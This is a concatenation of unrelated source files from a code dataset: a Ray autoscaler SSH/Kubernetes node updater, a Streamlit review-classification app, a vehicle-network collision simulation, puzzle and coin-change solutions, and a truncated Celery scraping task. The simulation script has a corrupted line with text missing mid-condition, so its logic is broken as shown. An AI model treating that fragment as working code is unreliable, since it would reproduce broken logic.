300\nREADY_CHECK_INTERVAL = 5\nHASH_MAX_LENGTH = 10\nKUBECTL_RSYNC = os.path.join(\n os.path.dirname(os.path.abspath(__file__)), \"kubernetes/kubectl-rsync.sh\")\n\n\ndef with_interactive(cmd):\n force_interactive = (\"true && source ~/.bashrc && \"\n \"export OMP_NUM_THREADS=1 PYTHONWARNINGS=ignore && \")\n return [\"bash\", \"--login\", \"-c\", \"-i\", quote(force_interactive + cmd)]\n\n\nclass KubernetesCommandRunner:\n def __init__(self, log_prefix, namespace, node_id, auth_config,\n process_runner):\n\n self.log_prefix = log_prefix\n self.process_runner = process_runner\n self.node_id = node_id\n self.namespace = namespace\n self.kubectl = [\"kubectl\", \"-n\", self.namespace]\n\n def run(self,\n cmd=None,\n timeout=120,\n exit_on_fail=False,\n port_forward=None,\n with_output=False):\n if cmd and port_forward:\n raise 
Exception(\n                \"exec with Kubernetes can't forward ports and execute \"\n                \"commands together.\")\n\n        if port_forward:\n            if not isinstance(port_forward, list):\n                port_forward = [port_forward]\n            port_forward_cmd = self.kubectl + [\n                \"port-forward\",\n                self.node_id,\n            ] + [\n                \"{}:{}\".format(local, remote) for local, remote in port_forward\n            ]\n            logger.info(\"Port forwarding with: {}\".format(\n                \" \".join(port_forward_cmd)))\n            port_forward_process = subprocess.Popen(\n                port_forward_cmd, stderr=subprocess.PIPE)\n            # communicate() blocks until the process exits, so we should never\n            # get past it. Reaching the lines below indicates that port\n            # forwarding failed, likely because we couldn't bind to a port.\n            pout, perr = port_forward_process.communicate()\n            exception_str = \" \".join(\n                port_forward_cmd) + \" failed with error: \" + perr.decode()\n            raise Exception(exception_str)\n        else:\n            logger.info(self.log_prefix + \"Running {}...\".format(cmd))\n            final_cmd = self.kubectl + [\"exec\", \"-it\"]\n            final_cmd += [\n                self.node_id,\n                \"--\",\n            ]\n            final_cmd += with_interactive(cmd)\n            try:\n                if with_output:\n                    return self.process_runner.check_output(\n                        \" \".join(final_cmd), shell=True)\n                else:\n                    self.process_runner.check_call(\n                        \" \".join(final_cmd), shell=True)\n            except subprocess.CalledProcessError:\n                if exit_on_fail:\n                    quoted_cmd = \" \".join(final_cmd[:-1] +\n                                          [quote(final_cmd[-1])])\n                    logger.error(\n                        self.log_prefix +\n                        \"Command failed: \\n\\n  {}\\n\".format(quoted_cmd))\n                    sys.exit(1)\n                else:\n                    raise\n\n    def run_rsync_up(self, source, target):\n        if target.startswith(\"~\"):\n            target = \"/root\" + target[1:]\n\n        try:\n            self.process_runner.check_call([\n                KUBECTL_RSYNC,\n                \"-avz\",\n                source,\n                \"{}@{}:{}\".format(self.node_id, self.namespace, target),\n            ])\n        except Exception as e:\n            logger.warning(self.log_prefix +\n                           \"rsync failed: '{}'. Falling back to 'kubectl cp'\"\n                           .format(e))\n            self.process_runner.check_call(self.kubectl + [\n                \"cp\", source, \"{}/{}:{}\".format(self.namespace, self.node_id,\n                                                target)\n            ])\n\n    def run_rsync_down(self, source, target):\n        if target.startswith(\"~\"):\n            target = \"/root\" + target[1:]\n\n        try:\n            self.process_runner.check_call([\n                KUBECTL_RSYNC,\n                \"-avz\",\n                \"{}@{}:{}\".format(self.node_id, self.namespace, source),\n                target,\n            ])\n        except Exception as e:\n            logger.warning(self.log_prefix +\n                           \"rsync failed: '{}'. 
Falling back to 'kubectl cp'\"\n .format(e))\n self.process_runner.check_call(self.kubectl + [\n \"cp\", \"{}/{}:{}\".format(self.namespace, self.node_id, source),\n target\n ])\n\n def remote_shell_command_str(self):\n return \"{} exec -it {} bash\".format(\" \".join(self.kubectl),\n self.node_id)\n\n\nclass SSHCommandRunner:\n def __init__(self, log_prefix, node_id, provider, auth_config,\n cluster_name, process_runner, use_internal_ip):\n\n ssh_control_hash = hashlib.md5(cluster_name.encode()).hexdigest()\n ssh_user_hash = hashlib.md5(getuser().encode()).hexdigest()\n ssh_control_path = \"/tmp/ray_ssh_{}/{}\".format(\n ssh_user_hash[:HASH_MAX_LENGTH],\n ssh_control_hash[:HASH_MAX_LENGTH])\n\n self.log_prefix = log_prefix\n self.process_runner = process_runner\n self.node_id = node_id\n self.use_internal_ip = use_internal_ip\n self.provider = provider\n self.ssh_private_key = auth_config[\"ssh_private_key\"]\n self.ssh_user = auth_config[\"ssh_user\"]\n self.ssh_control_path = ssh_control_path\n self.ssh_ip = None\n\n def get_default_ssh_options(self, connect_timeout):\n OPTS = [\n (\"ConnectTimeout\", \"{}s\".format(connect_timeout)),\n (\"StrictHostKeyChecking\", \"no\"),\n (\"ControlMaster\", \"auto\"),\n (\"ControlPath\", \"{}/%C\".format(self.ssh_control_path)),\n (\"ControlPersist\", \"10s\"),\n # Try fewer extraneous key pairs.\n (\"IdentitiesOnly\", \"yes\"),\n # Abort if port forwarding fails (instead of just printing to\n # stderr).\n (\"ExitOnForwardFailure\", \"yes\"),\n # Quickly kill the connection if network connection breaks (as\n # opposed to hanging/blocking).\n (\"ServerAliveInterval\", 5),\n (\"ServerAliveCountMax\", 3),\n ]\n\n return [\"-i\", self.ssh_private_key] + [\n x for y in ([\"-o\", \"{}={}\".format(k, v)] for k, v in OPTS)\n for x in y\n ]\n\n def get_node_ip(self):\n if self.use_internal_ip:\n return self.provider.internal_ip(self.node_id)\n else:\n return self.provider.external_ip(self.node_id)\n\n def wait_for_ip(self, deadline):\n while time.time() < deadline and \\\n not self.provider.is_terminated(self.node_id):\n logger.info(self.log_prefix + \"Waiting for IP...\")\n ip = self.get_node_ip()\n if ip is not None:\n return ip\n time.sleep(10)\n\n return None\n\n def set_ssh_ip_if_required(self):\n if self.ssh_ip is not None:\n return\n\n # We assume that this never changes.\n # I think that's reasonable.\n deadline = time.time() + NODE_START_WAIT_S\n with LogTimer(self.log_prefix + \"Got IP\"):\n ip = self.wait_for_ip(deadline)\n assert ip is not None, \"Unable to find IP of node\"\n\n self.ssh_ip = ip\n\n # This should run before any SSH commands and therefore ensure that\n # the ControlPath directory exists, allowing SSH to maintain\n # persistent sessions later on.\n try:\n os.makedirs(self.ssh_control_path, mode=0o700, exist_ok=True)\n except OSError as e:\n logger.warning(e)\n\n def run(self,\n cmd,\n timeout=120,\n exit_on_fail=False,\n port_forward=None,\n with_output=False):\n\n self.set_ssh_ip_if_required()\n\n ssh = [\"ssh\", \"-tt\"]\n\n if port_forward:\n if not isinstance(port_forward, list):\n port_forward = [port_forward]\n for local, remote in port_forward:\n logger.info(self.log_prefix + \"Forwarding \" +\n \"{} -> localhost:{}\".format(local, remote))\n ssh += [\"-L\", \"{}:localhost:{}\".format(remote, local)]\n\n final_cmd = ssh + self.get_default_ssh_options(timeout) + [\n \"{}@{}\".format(self.ssh_user, self.ssh_ip)\n ]\n if cmd:\n logger.info(self.log_prefix +\n \"Running {} on {}...\".format(cmd, self.ssh_ip))\n 
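# The explicit \"Begin remote output\" marker logged below makes it easier to\n            # tell where local autoscaler logging ends and the remote command's own\n            # stdout/stderr begins when the two streams are interleaved.\n            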
logger.info(\"Begin remote output from {}\".format(self.ssh_ip))\n final_cmd += with_interactive(cmd)\n else:\n # We do this because `-o ControlMaster` causes the `-N` flag to\n # still create an interactive shell in some ssh versions.\n final_cmd.append(quote(\"while true; do sleep 86400; done\"))\n\n try:\n if with_output:\n return self.process_runner.check_output(final_cmd)\n else:\n self.process_runner.check_call(final_cmd)\n except subprocess.CalledProcessError:\n if exit_on_fail:\n quoted_cmd = \" \".join(final_cmd[:-1] + [quote(final_cmd[-1])])\n raise click.ClickException(\n \"Command failed: \\n\\n {}\\n\".format(quoted_cmd)) from None\n else:\n raise click.ClickException(\n \"SSH command Failed. See above for the output from the\"\n \" failure.\") from None\n\n def run_rsync_up(self, source, target):\n self.set_ssh_ip_if_required()\n self.process_runner.check_call([\n \"rsync\", \"--rsh\",\n \" \".join([\"ssh\"] + self.get_default_ssh_options(120)), \"-avz\",\n source, \"{}@{}:{}\".format(self.ssh_user, self.ssh_ip, target)\n ])\n\n def run_rsync_down(self, source, target):\n self.set_ssh_ip_if_required()\n self.process_runner.check_call([\n \"rsync\", \"--rsh\",\n \" \".join([\"ssh\"] + self.get_default_ssh_options(120)), \"-avz\",\n \"{}@{}:{}\".format(self.ssh_user, self.ssh_ip, source), target\n ])\n\n def remote_shell_command_str(self):\n return \"ssh -o IdentitiesOnly=yes -i {} {}@{}\\n\".format(\n self.ssh_private_key, self.ssh_user, self.ssh_ip)\n\n\nclass NodeUpdater:\n \"\"\"A process for syncing files and running init commands on a node.\"\"\"\n\n def __init__(self,\n node_id,\n provider_config,\n provider,\n auth_config,\n cluster_name,\n file_mounts,\n initialization_commands,\n setup_commands,\n ray_start_commands,\n runtime_hash,\n process_runner=subprocess,\n use_internal_ip=False):\n\n self.log_prefix = \"NodeUpdater: {}: \".format(node_id)\n use_internal_ip = (use_internal_ip\n or provider_config.get(\"use_internal_ips\", False))\n self.cmd_runner = provider.get_command_runner(\n self.log_prefix, node_id, auth_config, cluster_name,\n process_runner, use_internal_ip)\n\n self.daemon = True\n self.process_runner = process_runner\n self.node_id = node_id\n self.provider = provider\n self.file_mounts = {\n remote: os.path.expanduser(local)\n for remote, local in file_mounts.items()\n }\n self.initialization_commands = initialization_commands\n self.setup_commands = setup_commands\n self.ray_start_commands = ray_start_commands\n self.runtime_hash = runtime_hash\n\n def run(self):\n logger.info(self.log_prefix +\n \"Updating to {}\".format(self.runtime_hash))\n try:\n with LogTimer(self.log_prefix +\n \"Applied config {}\".format(self.runtime_hash)):\n self.do_update()\n except Exception as e:\n error_str = str(e)\n if hasattr(e, \"cmd\"):\n error_str = \"(Exit Status {}) {}\".format(\n e.returncode, \" \".join(e.cmd))\n self.provider.set_node_tags(\n self.node_id, {TAG_RAY_NODE_STATUS: STATUS_UPDATE_FAILED})\n logger.error(self.log_prefix +\n \"Error executing: {}\".format(error_str) + \"\\n\")\n if isinstance(e, click.ClickException):\n return\n raise\n\n self.provider.set_node_tags(\n self.node_id, {\n TAG_RAY_NODE_STATUS: STATUS_UP_TO_DATE,\n TAG_RAY_RUNTIME_CONFIG: self.runtime_hash\n })\n\n self.exitcode = 0\n\n def sync_file_mounts(self, sync_cmd):\n # Rsync file mounts\n for remote_path, local_path in self.file_mounts.items():\n assert os.path.exists(local_path), local_path\n if os.path.isdir(local_path):\n if not local_path.endswith(\"/\"):\n local_path += 
\"/\"\n if not remote_path.endswith(\"/\"):\n remote_path += \"/\"\n\n with LogTimer(self.log_prefix +\n \"Synced {} to {}\".format(local_path, remote_path)):\n self.cmd_runner.run(\"mkdir -p {}\".format(\n os.path.dirname(remote_path)))\n sync_cmd(local_path, remote_path)\n\n def wait_ready(self, deadline):\n with LogTimer(self.log_prefix + \"Got remote shell\"):\n logger.info(self.log_prefix + \"Waiting for remote shell...\")\n\n while time.time() < deadline and \\\n not self.provider.is_terminated(self.node_id):\n try:\n logger.debug(self.log_prefix +\n \"Waiting for remote shell...\")\n\n self.cmd_runner.run(\"uptime\", timeout=5)\n logger.debug(\"Uptime succeeded.\")\n return True\n\n except Exception as e:\n retry_str = str(e)\n if hasattr(e, \"cmd\"):\n retry_str = \"(Exit Status {}): {}\".format(\n e.returncode, \" \".join(e.cmd))\n logger.debug(self.log_prefix +\n \"Node not up, retrying: {}\".format(retry_str))\n time.sleep(READY_CHECK_INTERVAL)\n\n assert False, \"Unable to connect to node\"\n\n def do_update(self):\n self.provider.set_node_tags(\n self.node_id, {TAG_RAY_NODE_STATUS: STATUS_WAITING_FOR_SSH})\n deadline = time.time() + NODE_START_WAIT_S\n self.wait_ready(deadline)\n\n node_tags = self.provider.node_tags(self.node_id)\n logger.debug(\"Node tags: {}\".format(str(node_tags)))\n if node_tags.get(TAG_RAY_RUNTIME_CONFIG) == self.runtime_hash:\n logger.info(self.log_prefix +\n \"{} already up-to-date, skip to ray start\".format(\n self.node_id))\n else:\n self.provider.set_node_tags(\n self.node_id, {TAG_RAY_NODE_STATUS: STATUS_SYNCING_FILES})\n self.sync_file_mounts(self.rsync_up)\n\n # Run init commands\n self.provider.set_node_tags(\n self.node_id, {TAG_RAY_NODE_STATUS: STATUS_SETTING_UP})\n with LogTimer(\n self.log_prefix + \"Initialization commands\",\n show_status=True):\n for cmd in self.initialization_commands:\n self.cmd_runner.run(cmd)\n\n with LogTimer(\n self.log_prefix + \"Setup commands\", show_status=True):\n for cmd in self.setup_commands:\n self.cmd_runner.run(cmd)\n\n with LogTimer(\n self.log_prefix + \"Ray start commands\", show_status=True):\n for cmd in self.ray_start_commands:\n self.cmd_runner.run(cmd)\n\n def rsync_up(self, source, target):\n logger.info(self.log_prefix +\n \"Syncing {} to {}...\".format(source, target))\n self.cmd_runner.run_rsync_up(source, target)\n\n def rsync_down(self, source, target):\n logger.info(self.log_prefix +\n \"Syncing {} from {}...\".format(source, target))\n self.cmd_runner.run_rsync_down(source, target)\n\n\nclass NodeUpdaterThread(NodeUpdater, Thread):\n def __init__(self, *args, **kwargs):\n Thread.__init__(self)\n NodeUpdater.__init__(self, *args, **kwargs)\n self.exitcode = -1\n","repo_name":"HuantWang/SUPERSONIC","sub_path":"third_party/ray/autoscaler/updater.py","file_name":"updater.py","file_ext":"py","file_size_in_byte":17175,"program_lang":"python","lang":"en","doc_type":"code","stars":119,"dataset":"github-code","pt":"37"} +{"seq_id":"32691387897","text":"import requests\nfrom bs4 import BeautifulSoup\nimport re\nfrom transformers import AutoTokenizer, AutoModelForSequenceClassification\nimport pandas as pd\nimport numpy as np\nimport torch\nimport matplotlib.pyplot as plt\nimport streamlit as st\n\n#verify if the user has a GPU\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n#load the models with the tokenizer\ntokenizer_sent = AutoTokenizer.from_pretrained(\"nlptown/bert-base-multilingual-uncased-sentiment\")\nmodel_sent = 
AutoModelForSequenceClassification.from_pretrained(\"nlptown/bert-base-multilingual-uncased-sentiment\")\n\ntokenizer_racism = AutoTokenizer.from_pretrained(\"davidmasip/racism\")\nmodel_racism = AutoModelForSequenceClassification.from_pretrained(\"davidmasip/racism\")\n\ntokenizer_politic = AutoTokenizer.from_pretrained(\"Newtral/xlm-r-finetuned-toxic-political-tweets-es\")\nmodel_politic = AutoModelForSequenceClassification.from_pretrained(\"Newtral/xlm-r-finetuned-toxic-political-tweets-es\")\n\n#function to get the reviews from the url\ndef request_web(url):\n    r = requests.get(url)\n    soup = BeautifulSoup(r.text, 'html.parser')\n    regex = re.compile('.*comment.*')\n    results = soup.find_all('p', {'class': regex})\n    reviews = [result.text for result in results]\n    return reviews\n\n#function to create a dataframe with the reviews\ndef dataframe(reviews):\n    df = pd.DataFrame(np.array(reviews), columns=['review'])\n    return df\n\n#function to get the sentiment score of a review\ndef sentiment_score(review):\n    tokens = tokenizer_sent.encode(review, return_tensors='pt', truncation=True, max_length=512)\n    result = model_sent(tokens)\n    return int(torch.argmax(result.logits)) + 1\n\n#function to get the racism score of a review\ndef racism_score(review):\n    tokens = tokenizer_racism.encode(review, return_tensors='pt', truncation=True, max_length=512)\n    result = model_racism(tokens)\n    return int(torch.argmax(result.logits))\n\n#function to get the political score of a review\ndef politic_score(review):\n    tokens = tokenizer_politic.encode(review, return_tensors='pt', truncation=True, max_length=512)\n    result = model_politic(tokens)\n    return int(torch.argmax(result.logits))\n\n#function to score all reviews, returning the average sentiment, the flagged\n#comments for each category, and the racism/political proportions\ndef average(df):\n    df['Sentiment'] = df['review'].apply(lambda x: sentiment_score(x))\n    df['Racism'] = df['review'].apply(lambda x: racism_score(x))\n    df['Politic'] = df['review'].apply(lambda x: politic_score(x))\n    racism_proportion = df['Racism'].sum() / len(df['Racism'])\n    politic_proportion = df['Politic'].sum() / len(df['Politic'])\n    average = df['Sentiment'].mean()\n    racism_comments = df[df['Racism'] == 1]['review'].tolist()\n    politic_comments = df[df['Politic'] == 1]['review'].tolist()\n    sad_comments = df[df['Sentiment'] == 1]['review'].tolist()\n    return average, racism_comments, politic_comments, sad_comments, racism_proportion, politic_proportion\n\n#main function\ndef main():\n    st.title(\"Analysis of Sentiment, Racism and Political Comments\")\n    st.write(\"Enter a URL to scrape reviews and get the results!\")\n\n    url = st.text_input(\"Enter the URL:\", \"\")\n\n    if url:\n        try:\n            reviews = request_web(url)\n            df = dataframe(reviews)\n            average_score, racism_comments, politic_comments, sad_comments, racism_proportion, politic_proportion = average(df)\n\n            plot_sentiment = df['Sentiment'].value_counts().plot(kind='bar')\n            st.pyplot(plot_sentiment.figure)\n\n            st.write(\"Average Sentiment Score (from 1 to 5): {:.2f}\".format(average_score))\n            st.subheader(\"Sad Comments:\")\n            for comment in sad_comments:\n                st.write(\"- \" + comment)\n\n            plot_racism = df['Racism'].value_counts().plot(kind='pie')\n            st.pyplot(plot_racism.figure)\n\n            st.write(\"Proportion of racism comments: {:.2f}\".format(racism_proportion))\n            st.subheader(\"Racism Comments:\")\n            for comment in racism_comments:\n                st.write(\"- \" + comment)\n\n            plot_politic = df['Politic'].value_counts().plot(kind='barh')\n            st.pyplot(plot_politic.figure)\n\n            st.write(\"Proportion of political comments: 
{:.2f}\".format(politic_proportion))\n st.subheader(\"Political Comments:\")\n for comment in politic_comments:\n st.write(\"- \" + comment)\n \n \n \n except Exception as e:\n st.error(f\"Error occurred: {e}\")\n st.write(\"Make sure the provided URL is valid and contains review elements.\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"sergioq2/TextClassification_HuggingFace_App","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4643,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"1544840918","text":"import numpy as np\nimport random\nimport matplotlib.pyplot as plt\nimport csv\nimport math\nimport copy\nimport scipy.stats as stats\n\n\n\nC_max = 50 # 车辆数\nT_max = 1200\nQ_max = 2000\nL = 20\nd_sen = 500\nS = 2\na = 0\nb = 0\nc = 0\nd = 0\ne = 0\nN_bn = 0\nN_oa = 0\nN_A = 0\nN_D = 0\nN_ccr = 0\n\n\nfile = open('distance_data_50', 'r')\nd = file.read().split()\ndistance_1 = list(float(i) for i in d)\ndistance_2 = []\nfor i in range(len(distance_1)):\n distance_2.append(np.array(distance_1[i]))\ndhk = np.array(distance_2) \n\n\nif L==100:\n f = 10\n Rl = 5\n Rh = 15\nelif L==50:\n f = 20\n Rl = 10\n Rh = 30\nelif L==20:\n f = 50\n Rl = 25\n Rh = 75\n\nC_priority = np.zeros(C_max)\nC_fairness_random = np.zeros(C_max)\nC_fairness_proposed = np.zeros(C_max)\nT_queue_proposed = np.zeros(T_max)\nT_queue_random = np.zeros(T_max)\nT_compare_queue1 = np.zeros(T_max)\nT_compare_queue2 = np.zeros(T_max)\nT_client_choice_proposed = np.zeros(T_max)\nT_client_choice_random = np.zeros(T_max)\nT_accuracy_proposed = np.zeros(T_max)\nT_accuracy_random = np.zeros(T_max)\nT_departure = np.zeros(T_max)\nT_alive_client_proposed = np.zeros(T_max)\nT_alive_client_random = np.zeros(T_max)\ns_star_proposed = []\ns_star_random = []\ns_star_static = []\nTotal_Data_Proposed = 0\nTotal_Data_Random = 0\ncopy_T_queue_proposed = []\ncopy_T_queue_random = []\nepsilon_1 = np.zeros(C_max)\na_E_1 = np.zeros(C_max)\nr_1 = np.zeros(C_max)\nDelay = np.zeros(C_max)\nd_kr = np.zeros(C_max)\nd_ir = np.zeros(C_max)\nd_ki = np.zeros(C_max)\nK_S = np.zeros(C_max)\nd_1 = np.zeros(C_max)\nd_2 = np.zeros(C_max)\nd_2 = np.zeros(C_max)\nK_C = np.zeros(C_max-1)\nP_same = np.zeros(C_max-1)\nC_n = [10 for i in range(C_max)]\nC_distance = np.zeros(C_max)\n\n\nfo = open('int_50_50_23_2.txt', 'r')\n\n\n\nP_col = np.zeros(C_max)\nfor i in range(C_max):\n d_kr[i] = abs(500 - dhk[i])\nfor j in range(C_max): \n d_ir = copy.deepcopy(d_kr) \n d_ir[j] = 0 \n d_ki = abs(dhk-dhk[j])\n d_ki = np.delete(d_ki, j)\n N_total = (1000*S)/f\n N_lc = 0.2*N_total\n P_rc0 = 1/(Rh-Rl)\n a = np.sum(d_ki<=d_sen)\n K_S[j] = a\n for k in range(C_max-1):\n d_1 = copy.deepcopy(dhk)\n d_1 = np.delete(d_1, j)\n d_2 = copy.deepcopy(dhk)\n b = d_2[j] + d_sen\n c = d_1[k] + d_sen\n d = d_2[j] - d_sen\n e = d_1[k] - d_sen\n if b > 1000:\n b = 1000\n if d < 0:\n d = 0\n if c > 1000:\n c = 1000\n if e < 0:\n e = 0\n g = 0 \n for l in range(C_max-2):\n d_3 = copy.deepcopy(d_1)\n d_3 = np.delete(d_3, k)\n if max(d,e)= 1:\n N_ccr = (N_D-N_A)*(1-(1/N_D))**N_A\n print(N_ccr)\n else:\n N_ccr = 0\n if d_ki[m]<=d_sen:\n h = (P_rc0*N_ccr)/(N_lc*N_lc)\n P_same[m] = h\n elif d_ki[m]>d_sen:\n h = N_ccr/(N_lc*N_lc)\n P_same[m] = h \n P_int = []\n line = fo.readline()\n P_int_1 = []\n P_int_2 = line.split(',')\n for x in P_int_2:\n newx = float(x)\n P_int_1.append(newx)\n P_int_1 = np.array(P_int_1)\n P_int = np.array(P_int_1)\n col = np.zeros(C_max)\n col = P_same*P_int\n prod = 0\n prod = 1 - 
np.prod(1-col)\n P_col[j] = prod\n# print(P_col)","repo_name":"qiongwu86/Vehicle-selection-for-C-V2X","sub_path":"col.py","file_name":"col.py","file_ext":"py","file_size_in_byte":3527,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"6590592346","text":"# strings\nlines = [l.strip() for l in open('input') if l]\nvalues = [int(v) for v in list(lines[0])]\n\npattern = [0, 1, 0, -1]\n\n\ndef run_thing(input):\n current_permutation = list(input)\n next_permutation = []\n\n for _ in range(100):\n current_permutation = [0] + current_permutation\n\n track = []\n for index, _ in enumerate(current_permutation):\n # index = len(current_permutation) - index - 1\n amount = 0\n pattern_index = 0\n\n itt_index = 0\n itt_inc = index + 1\n\n while itt_index < len(current_permutation):\n end_index = min(itt_index + itt_inc, len(current_permutation))\n if pattern[pattern_index] == 0:\n pass\n elif pattern[pattern_index] == 1:\n amount += sum(current_permutation[itt_index:end_index])\n elif pattern[pattern_index] == -1:\n amount -= sum(current_permutation[itt_index:end_index])\n\n pattern_index += 1\n pattern_index %= len(pattern)\n itt_index += itt_inc\n\n next_permutation.append(int(str(amount)[-1]))\n track .append(amount)\n\n current_permutation = next_permutation[:-1]\n next_permutation = []\n\n return current_permutation[:-1]\n\n# parts\ndef part1():\n result = run_thing(values)\n\n return ''.join([str(v) for v in result[:8]])\n\n\ndef part2():\n input = values * 10000\n\n offset_index = int(''.join(map(str, input[:7])))\n\n sub_values = input[offset_index:]\n\n for _ in range(100):\n current_sum = 0\n for i in range(len(sub_values) - 1, -1, -1):\n current_sum += sub_values[i]\n sub_values[i] = current_sum % 10\n\n return ''.join([str(v) for v in sub_values[:8]])\n\n\nprint('Part 1: ', part1()) # 25131128\nprint('Part 2: ', part2())\n","repo_name":"victorkirov/aoc","sub_path":"2019/16/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22526068887","text":"\"\"\"\nGiven array of pos ints representing denominations, and a single non-negative\nint representing a target amount of money. 
Write function to return number\nof ways to make change for that target amount.\n\nSample input: 6,[1,5]\nSample output: 2 (1x1 + 1x5 and 6x1)\n\"\"\"\n\nclass Prob:\n    '''\n    Recursive, brute force.\n    Let n = starting amount from which to make change.\n    Time complexity: O(2^n), since each helper call creates 2 other helper calls.\n    Space complexity: O(n), since there are at most n recursive calls on the call stack.\n    https://algorithms.tutorialhorizon.com/dynamic-programming-coin-change-problem/\n    '''\n    @staticmethod\n    def numWaysMakeChangeRec(n, denoms):\n\n        def helper(n, denoms, d):\n            if n < 0:\n                return 0\n            if n == 0:\n                return 1\n\n            # If there are no denominations left, there are no ways to make change.\n            if d < 0:\n                return 0\n\n            # solutions that contain at least 1 denoms[d] denomination\n            # d is passed into helper again b/c there could be another denom[d] that is selected.\n            nwWithDenom = helper(n-denoms[d], denoms, d)\n\n            # solutions that don't contain the denoms[d] denomination\n            # d-1 is passed into helper b/c on the next call, d cannot be chosen.\n            nwWithoutDenom = helper(n, denoms, d-1)\n\n            return nwWithDenom + nwWithoutDenom\n\n        return helper(n, denoms, len(denoms)-1)\n\n    '''\n    Time complexity: O(n*len(denoms)), since each of the n*len(denoms) subproblems is solved once;\n    any repeated call returns the previously solved memoized solution in O(1).\n    Space complexity: O(n*len(denoms)), since the memo is a (n+1)*len(denoms) matrix.\n    '''\n    @staticmethod\n    def numWaysMakeChangeRecMemo(n, denoms):\n\n        def helper(n, denoms, d, memo):\n            print(\"n={}, d={}\".format(n,d))\n            print(\"memo:\")\n            for row in memo:\n                print(\"\\t\",row)\n\n            if n < 0:\n                return 0\n            if n == 0:\n                return 1\n            if d < 0:\n                return 0\n\n            if memo[n][d] is not None:\n                print(\"found memo: \", memo[n][d])\n                return memo[n][d]\n\n            nwWithDenom = helper(n-denoms[d], denoms, d, memo)\n            nwWithoutDenom = helper(n, denoms, d-1, memo)\n            memo[n][d] = nwWithDenom + nwWithoutDenom\n\n            return memo[n][d]\n\n        # init memo\n        memo = [[None for _ in range(len(denoms))] for _ in range(n+1)]\n        return helper(n, denoms, len(denoms)-1, memo)\n\n    '''\n    Time complexity: O(len(denoms)^n), since for each helper call, there are up to len(denoms) helper calls.\n    Space complexity: O(n), there are at most n items on the recursive call stack.\n    '''\n    @staticmethod\n    def numWaysMakeChangeRec2(n, denoms):\n\n        def helper(n, denoms, d):\n            if n < 0:\n                return 0\n            if n == 0:\n                return 1\n\n            nw = 0\n            for i in range(d+1):\n                nw += helper(n-denoms[i], denoms, i)\n\n            return nw\n\n        return helper(n, denoms, len(denoms)-1)\n\n    '''\n    Time complexity: O(n*len(denoms)^2), since there are n*len(denoms) memoized subproblems\n    and each one loops over up to len(denoms) denominations.\n    Space complexity: O(n*len(denoms)) for the memo matrix.\n    '''\n    @staticmethod\n    def numWaysMakeChangeRec2Memo(n, denoms):\n        def helper(n, denoms, d, memo):\n            if n < 0:\n                return 0\n            if n == 0:\n                return 1\n\n            if memo[n][d] is not None:\n                print(\"memo found: \", memo[n][d])\n                return memo[n][d]\n\n            nw = 0\n            for i in range(d+1):\n                nw += helper(n-denoms[i], denoms, i, memo)\n            memo[n][d] = nw\n\n            return memo[n][d]\n\n        memo = [[None for _ in range(len(denoms))] for _ in range(n+1)]\n        return helper(n, denoms, len(denoms)-1, memo) \n\n    \"\"\"\n    Complexity\n    Time: O(n*len(denoms)), because you need a for loop over denoms, and a for loop over n\n    Space: O(n), because you need an array to store up to n values.\n    \"\"\"\n    @staticmethod\n    def numWaysMakeChangeDP(n, denoms):\n        denoms = sorted(denoms)\n\n        # init array to keep track of ways to make change up to n\n        waysForAmt = [0] * (n+1)\n        waysForAmt[0] = 1 # because for n=0, there is only 1 way to make change, and that is with no coins.\n        #print(\"waysForAmt: \", 
waysForAmt)\n \n for d in range(len(denoms)):\n for i in range(n+1):\n denom = denoms[d]\n print(\"denom: {}, i: {}\".format(denom, i))\n if i >= denom:\n waysForAmt[i] += waysForAmt[i-denom]\n print(\"waysForAmt: \", waysForAmt)\n \n # the last value will result in the total num of ways to make change\n return waysForAmt[-1]\n \n @staticmethod\n def test1(alg):\n n = 6\n denoms = [1,5]\n alg(n, denoms)\n \n @staticmethod\n def test2(alg):\n n = 9\n denoms = [5,1]\n alg(n, denoms)\n \n @staticmethod\n def test3(alg):\n n = 25\n denoms = [1,5,10,25] # correct ans: 13\n \n #n = 6\n #denoms = [1,5]\n ways = alg(n, denoms)\n print(\"test3: ways: \", ways)\n \n @staticmethod\n def test4(alg):\n n = 0\n denoms = [1,2,3,4]\n ways = alg(n, denoms)\n print(\"test4: ways: \", ways)\n\n#alg = Prob.numWaysMakeChangeRec\n#alg = Prob.numWaysMakeChangeRecMemo\n#alg = Prob.numWaysMakeChangeRec2\n#alg = Prob.numWaysMakeChangeRec2Memo\nalg = Prob.numWaysMakeChangeDP\n\n#Prob.test1(alg)\n#Prob.test2(alg)\nProb.test3(alg)\n#Prob.test4(alg)","repo_name":"mcxu/code-sandbox","sub_path":"PythonSandbox/src/misc/coin_change_num_ways.py","file_name":"coin_change_num_ways.py","file_ext":"py","file_size_in_byte":5829,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"11299539503","text":"import csv\nimport hashlib\nimport requests\nimport urllib.request\nimport zipfile\nfrom base64 import urlsafe_b64encode\nfrom bs4 import BeautifulSoup\nfrom celery import shared_task\nfrom django.conf import settings\n\ntry:\n from urllib import urlencode\nexcept ImportError:\n from urllib.parse import urlencode\n\nfrom api import models\n\n\nWEBSITES_TO_PARSE_COUNT = 4\n\n\ndef webshrinker_categories_v3(access_key, secret_key, url=b\"\", params={}):\n params['key'] = access_key\n\n request = \"categories/v3/{}?{}\".format(urlsafe_b64encode(url).decode('utf-8'), urlencode(params, True))\n request_to_sign = \"{}:{}\".format(secret_key, request).encode('utf-8')\n signed_request = hashlib.md5(request_to_sign).hexdigest()\n\n return \"https://api.webshrinker.com/{}&hash={}\".format(request, signed_request)\n\n\n@shared_task\ndef update_websites():\n url = 'http://s3.amazonaws.com/alexa-static/top-1m.csv.zip'\n filehandle, _ = urllib.request.urlretrieve(url)\n zip_file_object = zipfile.ZipFile(filehandle, 'r')\n first_file = zip_file_object.namelist()[0]\n file = zip_file_object.open(first_file)\n with open('websites.csv', 'wb') as f:\n f.write(file.read())\n with open('websites.csv', 'r') as csvfile:\n reader = 